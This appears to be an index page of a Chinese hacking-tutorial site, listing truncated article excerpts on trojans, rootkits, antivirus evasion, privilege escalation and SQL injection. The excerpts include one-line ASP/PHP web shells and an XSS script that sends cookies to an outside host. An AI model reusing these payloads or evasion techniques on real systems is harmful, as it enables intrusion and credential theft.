网络安全

教你如何用非主流方式抓鸡（图）

事先声明一下,其实这个是没有什么技术含量的,只是一个思路.第一步:找一个可以观看的SWF文件　　第二步:用"SmartSWF.EXE'把这个SWF文件转换成EXE文件,当然也可以用其他的软件　　第三步:打开"南域剑盟捆绑器2008正式版" 把我们的木马和...

安全教程 2022-02-17 54 0 方式主流如何邮件我们这个地址文件然后贺卡"
mysql 读取文件的几种方式及应用

章出处:C.R.S.T 作者:sai52[B.H.S.T] 今天朋友问我如何在mysql下读取文件，把我问愣了，发现自己还是犯了不求甚解的毛病，因此特地查了下mysql使用手册。思路都一样，在拥有file权限的前提下，读取文件为字符串形式插入表中，然后读出表中数据，只...

安全教程 2022-02-17 281 0 mysql 读取文件"
Cookies欺骗教程（图）

1.什么是Cookies　　Cookies是一个储存于浏览器目录中的小文本，记录你访问一个特定站点的信息，只能被该站点读回。储存在Cookies中的大部分信息是普通的，如：每一次的击键信息和被访站点的地址等。但是许多Web站点使用Cookies来储存针对私人的数据，如：注册口令、用...

安全教程 2022-02-17 34 0 教程欺骗 Cookies 权限信息论坛站点用户文件一个"
教你让网马原代码隐藏的方法

网马再怎么加密,都有可能被反加密的可能,为了更好保护自己的代码,看看这办法,但这办法对付不了抓包分析,数据包抓取也是没办法的目的:查看源代码没有内容,查看缓冲区也没内容1.asp文件写法<%'禁止缓冲区 Response.CacheControl = "no...

安全教程 2022-02-17 36 0 方法隐藏代码 &quot &lt clear no-cache&quot 办法"
Rootkit隐形技术入门详解

一、综述本文将引领读者打造一个初级的内核级Rootkit，然后为其引入两种简单的隐形技术：进程隐形技术和文件隐形技术。同时，为了让读者获得rootkit编程的相关经验，我们顺便介绍了rootkit的装载、卸载方法，以及必不可少的测试技术。本文介绍的Rootkit的主要构件是...

安全教程 2022-02-17 79 0 详解入门技术隐形驱动程序 rootkit 我们一个设备"
对Linux服务器的四种入侵级别

随着Linux企业应用的扩展，有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注，这里根据Linux服务器受到攻击的深度以级别形式列出，并提出不同的解决方案。　　对Linux服务器攻击的定义是：攻击是一种旨在妨碍、损害、削弱、破坏Linu...

安全教程 2022-02-17 90 0 级别入侵服务器攻击服务用户拒绝 Linux 本地网络"
实战讲解跨站入侵攻击

很多时候在企业网络安全，特别是服务器上数据库安全防范方面需要特别注意，弥补所有漏洞，减少因设置不当带来的入侵事件的发生。然而在实际使用与维护过程中我们经常会听到一个新的名词——“跨站入侵”，那么什么是“跨站入侵”，他是如何产生如何被利用的呢?今天就请各...

安全教程 2022-02-17 45 0 攻击入侵讲解实战我们站点数据库网站注入信息"
利用windows自带功能做永不被查杀的下载者(超小体积)！

用windows自带功能做永不被查杀，超小体积的下载者！利用windows自带功能做永不被查杀，超小体积的下载者！今天自己搞出来个永不会被杀的下载者好东西就要拿出来和大家分享,,, 把制作过程告诉大家吧.... 看不懂的可以加我QQ 523085615 来问我。我的网站有许多自己...

安全教程 2022-02-17 20 0 不被查杀下载者"
公开个Nday（图）

08046估计国内很多小牛大牛搞出来了.最早知道有这么个洞大约是在今年三四月份,听某牛man说有个系统默认支持的图片格式的洞,结果四月份出了个MS08-021,POC也有公开的,当时以为传言指的就是这两个"鸡肋".没想到8月份MS又出了MS08-046,分析过程如下: 先认真...

安全教程 2022-02-17 28 0 公开文件这个函数分析可以出错长度指针一个"
教你教菜鸟清除SQL server日志的方法

这个问题很多人受到了困扰，日志动辄十几个g问：SQLServer中的事务日志应该怎样压缩和删除？答：具体方法有3种。方法一: 第一步： backup log database_name with no_log或者 backup log database_name with truncate_only -- no_log和trun...

安全教程 2022-02-17 87 0 日志方法清除菜鸟文件数据库 -&gt 执行收缩这个"
教你SQLSERVER扩展存储过程XP_CMDSHELL的简单应用

XP_CMDSHELL存储过程是执行本机的CMD命令，要求系统登陆有SA权限，也就是说如果获得SQLSERVER的SA命令，那就可以在目标机为所欲为了，知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。下面是我写的一个简单的应用页面(ASP)，代码如下。...

安全教程 2022-02-17 50 0 简单应用过程存储扩展 &lt &quot &gt class align"
判断数据库web是否分离的技巧

得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离，结果不一样就是分离的点评：在实际的渗透过程中，我们常常会困惑数据库和web究竟是否在一台服务器上，有了这个办法就很容易判断出来了。...

安全教程 2022-02-17 82 0 数据库 web 分离"
木马保护生成

这几天研究了一下木马保护生成，现在给各位菜鸟分享一下。很多人做木马生成器但是不想让别人改或研究生成后的木马这就需要对生成出的木马进行保护。保护的手段一般是加壳或者加密。过程一般是将配置信息写入木马服务端后加壳，这样的方法对付一些菜鸟可以但是...

安全教程 2022-02-17 81 0 生成保护木马方法配置加壳信息可以服务进行"
教你如何通过Mysql弱口令得到系统权限

很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上传udf dll文件，然后利用注册UDF DLL中自写的Function...

安全教程 2022-02-17 54 0 系统权限得到口令通过如何我们文件 &#039 mysql"
一句话木马(asp,php) 总结篇

asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); </...

安全教程 2022-02-17 37 0 一句话木马"
CSRF—攻击与防御

0x01 什么是CSRF攻击CSRF是Cross Site Request Forgery的缩写（也缩写为XSRF），直译过来就是跨站请求伪造的意思，也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做，你可以把它想做HTTP会话劫持。网站是通过cookie来识别用...

安全教程 2022-02-17 38 0 防御攻击 CSRF 一个这个用户浏览器请求可以我们"
如何让进程在Linux后台运行

在Linux中，如果要让进程在后台运行，一般情况下，我们在命令后面加上&即可，实际上，这样是将命令放入到一个作业队列中了：$ ./test.sh &[1] 17208$ jobs -l[1] 17208 Running ./test.sh &对于已经在前台执行的命令，也可以重新放到后台执...

安全教程 2022-02-17 60 0 运行后台进程如何 ./test.sh &amp 命令 test grep"
总结各大高手的提权思路

c: d: e:.....C:Documents and SettingsAll Users「开始」菜单程序看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径，C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere看能否跳转到这个目录，如果行那就...

安全教程 2022-02-17 55 0 思路高手总结 C:system32 c:&quot inetsrv WINNT"
拿下DVBBS php官网详细过程（图）

注意:文章已经发表在2008第7期《黑客手册》上,转载请注明出处。几个月前，DVBBS php2.0暴了一个可以直接读出管理员密码的sql注入漏洞，当时这个漏洞出来的时候，我看的心痒，怎么还会有这么弱智的漏洞，DVBBS php2.0这套代码我还没仔细看过，于是5月中旬我down下来...

安全教程 2022-02-17 36 0 过程详细 &#039 _POST trim activeid if 显示注入登陆"
phpcms2008注射0day

中秋节到了，这里我送上phpcms2008的一枚注射漏洞！！希望各位朋友多多支持本站啊~~漏洞存在于ask/search.php文件，以下是漏洞代码：if($keywords){ $where .= " AND title LIKE '%$keywords%'";}$infos = $ask->listinfo...

安全教程 2022-02-17 34 0 注射 &#039 &quot where page 漏洞 if order listinfo"
asp php XSS获取cookie的代码

<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> news.asp代码： <% msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath(&q...

安全教程 2022-02-17 58 0 asp php XSS cookie"
弹窗口的流氓软件核心代码

ps:请勿用于非法用途，仅供技术研究之用。 by：yunshu 这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹……程序安装成服务，并设置为自动启动。启动之后写入一段代码到explorer.exe进程中，也就是这里在弹网页...

安全教程 2022-02-17 49 0 弹窗口流氓软件"
教你如何应对DDoS险滩

随着网络带宽的增加和多种DDoS黑客工具的发布，各种DDoS攻击软件都可以很轻松地从互联网上获得。于是，DDoS拒绝服务攻击的实施越来越容易，DDoS攻击事件的上升趋势给飞速发展的互联网带来了重大的安全威胁。商业竞争、打击报复、网络敲诈……多种原因导致很多...

安全教程 2022-02-17 53 0 应对如何攻击 DDoS 流量服务防护系统用户网络"
分析黑客使用Web进行攻击的10大原因

1．桌面漏洞 Internet Explorer、Firefox和Windows操作系统中包含很多可以被黑客利用的漏洞，特别是在用户经常不及时安装补丁的情况下。黑客会利用这些漏洞在不经用户同意的情况下自动下载恶意软件代码——也称作隐藏式下载。 2．服务器漏洞...

安全教程 2022-02-17 42 0 攻击原因进行黑客使用分析恶意软件网站用户"
木马免杀绝招以及常用的修改方法

常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　 ...常用的木马免杀方法绝招一：快速搞定瑞星文件查杀操作步骤：　第一步：用OD载入，来到程序的入口点。　第二步：把入口点的第一句PUSH　EBP　改成POP　EBP　然...

安全教程 2022-02-17 26 0 木马免杀绝招"

8610 首页上一页 327 328 329 330 331 332 333 334 335 336 下一页尾页

网络安全

热门文章

最近发表

标签列表

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?140f68603cbfb8643906eda43fb35b59"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); | 桂ICP备2023010378号-4

Powered By EmpireCMS

| 桂ICP备2023010378号-4